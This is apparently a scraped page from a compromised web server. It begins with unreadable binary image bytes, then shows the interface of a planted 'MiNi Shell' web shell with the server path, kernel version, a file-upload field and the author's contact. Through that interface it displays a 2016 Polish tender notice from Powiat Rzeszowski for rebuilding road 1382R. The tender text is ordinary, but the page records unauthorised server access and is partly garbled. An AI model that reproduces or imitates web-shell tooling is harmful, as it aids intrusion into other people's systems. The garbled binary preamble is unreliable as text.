JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160324/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160324/67180-N-2016.html

<p class="kh_header"><b>Rzeszów: Przebudowa drogi powiatowej Nr 1382R Rzeszów-Trzebownisko-Łukawiec-Czarna w km od 8+032 do 17+462</b><br>
<b>Numer ogłoszenia: 67180 - 2016; data zamieszczenia: 24.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Rzeszowski , ul. Grunwaldzka 15, 35-959 Rzeszów, woj. podkarpackie, tel. 17 8671463, faks 17 8671964.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi powiatowej Nr 1382R Rzeszów-Trzebownisko-Łukawiec-Czarna w km od 8+032 do 17+462.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przebudowa drogi powiatowej Nr 1382R Rzeszów-Trzebownisko-Łukawiec-Czarna 
w km od 8+032 do 17+462.
Zamówienie obejmuje m.in.:
1)	Roboty przygotowawcze i rozbiórkowe:
- roboty pomiarowe - 9,43 km;
- karczowanie zagajniki i zarośla - 0,5 ha.;
- oczyszczenie terenu z pozostałości po wykarczowaniu - 5000 m2;
- rozebranie nawierzchni (z płytek betonowych kostki brukowej betonowej) - 8,5 m2;
- cięcie nawierzchni mechanicznie, z mas mineralno-asfaltowych - 2040 m;
- rozebranie nawierzchni z mieszanek mineralno-bitumicznych - 940 m2;
- rozebranie krawężników betonowych - 150 m;
- rozebranie obrzeży trawnikowych - 100 m;
- rozebranie betonowych ścianek czołowych przepustów - 127 m3;
- wywiezienie gruzu z terenu rozbiórki - 203 m3;
- rozebranie przepustów drogowych (O40, O50, O60, O80) - 192 m;
- wywiezienie rozebranych elementów betonowych przepustów drogowych  - 38,4 m3;
- rozebranie przepustów rurowych pod zjazdami  (O20, O30, O40, O50, O60) - 1723 m;
- rozebranie znaków drogowych (tablic i słupków) - 10 szt.;
- rozebranie barier energochłonnych stalowych - 24 m;
- regulacja pionowa studzienek dla urządzeń podziemnych - 60 szt.

2)  Roboty ziemne:
- roboty ziemne koparką ( w tym dokop  7920 m3)   - 10900 m3;
- ręczne formowanie nasypów - 10900 m3;
- zagęszczenie nasypów - 10900 m3;
- plantowanie skarp i korony nasypów - 5900 m2;

3)  Odwodnienie korpusu drogowego:
- przepusty O 50, O 60, O 80 na ławie z tłucznia - 212 m;
- obudowy wlotów (wylotów) przepustów - 10 m3;
- ścianki czołowe betonowe dla przepustów rurowych - 11 szt.;
- zasypanie wykopów (dokop) wraz z zagęszczeniem - 294 m3;
- oczyszczanie przepustów pod drogami z namułu - 32 m;
- rów kryty (O 400; O 500, O 600) - 6763 m;
- obudowa wylotów kolektorów O 40, O 50, O 60 - 20 szt.;
- studnie rewizyjne (O 1200, O 1500 i O 2000 o głębokości 1,5-2,5 m) - 172 szt.;
- studzienki ściekowe O 500 - 134 szt.;
- przykanaliki - 268 m;
- ściek przykrawężnikowy z kostki brukowej betonowej na ławie z betonu - 510 m2

4)  Podbudowy:
- koryto na poszerzeniu jezdni - 4240 m2;
- podbudowa na poszerzeniu (pospółka 20 cm + stabilizacja cementem + tłuczeń gr. 15 cm) 
    - 4670 m2;
- podbudowa pod chodnik (pospółka 15 cm + chudy beton 10 cm) - 9920 m2

5)  Nawierzchnia:
- nawierzchnia z betonu asfaltowego grysowo-żwirowego - w-wa wzmacniająca gr. 6 cm na poszerzeniu - 4670m2;
- frezowanie nawierzchni (średnio 4 cm) - 5700 m2;
- oczyszczenie nawierzchni bitumicznych - 63670 m2;
- skropienie nawierzchni emulsją asfaltową - 63670 m2;
- profilowanie nawierzchni betonem asfaltowym grysowo-żwirowym - 4490 t;
- ułożenie geosiatki  z włókien szklanych powlekanej asfaltem - 5100 m2;
- oczyszczenie nawierzchni bitumicznych - 63670 m2;
- skropienie nawierzchni emulsją asfaltową - 63670 m2;
- nawierzchnia z betonu asfaltowego grysowo-żwirowego - w-wa wiążąca gr. 4 cm - 63670 m2;
- skropienie nawierzchni emulsją asfaltową - 61780 m2;
- nawierzchnia z betonu asfaltowego grysowo-żwirowego - w-wa ścieralna gr. 4 cm - 61780 m2;

   6) Chodnik:
- krawężnik betonowy 15x30 na ławie betonowej z oporem - 3682 m;
- obrzeże trawnikowe 30x8 na ławie betonowej z oporem - 3613 m;
- nawierzchnia z kostki brukowej betonowej gr 6 cm na podsypce cem.-piask.  - 5290 m2;
- nawierzchnia z tłucznia kamiennego gr. 8 cm na poboczach i zjazdach - 8600 m2;

7) Urządzenia bezpieczeństwa ruchu:
- ustawienie znaków drogowych  - 10 szt;
- ustawienie barier drogowych (z rozbiórki)  - 24 m;
- ustawienie barier drogowych nowych  - 438 m;
- ustawienie barier wygradzających ruch pieszy - 150 m.;

8) Roboty wykończeniowe:
- wykonanie budowli siatkowo-kamiennych- 74 m3;
- umocnienie skarp rowów płytami wielootworowymi gr. 8 cm na pods. cem.-piask. - 150 m2;
- ścieki z elementów betonowych gr. 15 cm na pods. cem.-piask. - 50 m;
- oczyszczenie rowu z namułu (gr. 30 cm) - 7700 m;
- przepusty pod zjazdami (O 400, O 500, O 600)  na ławie żwirowej - 1155 m;
- ścianki czołowe betonowe dla przepustów rurowych O60  na ławie z tłucznia - 46 szt;
- obrukowanie wlotów/wylotów przepustów kostką brukową betonową - 89 m2;
- przełożenie nawierzchni chodnika z kostki brukowej betonowej - 500 m2;
- przełożenie krawężnika na ławie betonowej - 350 m;
- nawierzchnia na zjazdach z betonu asfaltowego gr. 6 cm - 3700 m2.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt. 6 ustawy, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego. Będą one udzielone w przypadku powtórzenia tego samego rodzaju zamówień</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.23.31.41-9, 45.23.31.42-6, 45.23.32.22-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga od Wykonawców wniesienia wadium, w wysokości 100 000,00 PLN, słownie: sto tysięcy złotych 00/100</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku wiedzy i doświadczenia Zamawiający uzna realizację w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej 3 zamówień, których przedmiotem  była budowa, rozbudowa lub przebudowa drogi publicznej kategorii powiatowej, wojewódzkiej, krajowej  o wartości min. 4,5 mln złotych każde zamówienie.
Do wykazanych robót należy dołączyć dowody określające, czy roboty zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Wymóg dołączenia dowodów  nie dotyczy wykonawców, którzy świadczyli roboty budowlane wskazane w wykazie na rzecz Powiatu Rzeszowskiego lub Zarządu Dróg Powiatowych 
w Rzeszowie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający uzna
dysponowanie jedną osobą przewidzianą do kierowania robotami budowlanymi, posiadającą uprawnienia budowlane w zakresie dróg uprawniające do kierowania robotami budowlanymi bez ograniczeń</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Pełnomocnictwo w oryginale lub kopii potwierdzonej notarialnie - jeżeli ofertę podpisuje pełnomocnik.
2.Wykaz części zamówienia, które Wykonawca zamierza powierzyć podwykonawcom 
3.Kosztorys ofertowy.
4.Dowód wniesienia wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 99</li>
<li>2 - okres gwarancji i rękojmi - 1</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania istotnych zmian umowy:
1)zmiany na stanowisku Kierownika Budowy i/lub Inspektora Nadzoru w przypadku niemożliwości pełnienia przez nich powierzonych im funkcji;
2)zmiany ceny określonej w umowie w przypadku urzędowych zmian podatku od towarów i usług (VAT) o wskaźnik zmiany stawki podatku;
3)zmiany ceny określonej w umowie w przypadku zmiany zakresu robót określonych w kosztorysie ofertowym</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zdp.rzeszow.pl/?c=mdTresc-cmPokaz-19<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Rzeszowie, 35-317 Rzeszów, ul. Budziwojska 149, pok. Nr 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.04.2016 godzina 10:00, miejsce: Zarząd Dróg Powiatowych w Rzeszowie, 35-317 Rzeszów, ul. Budziwojska 149, pok. Nr 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com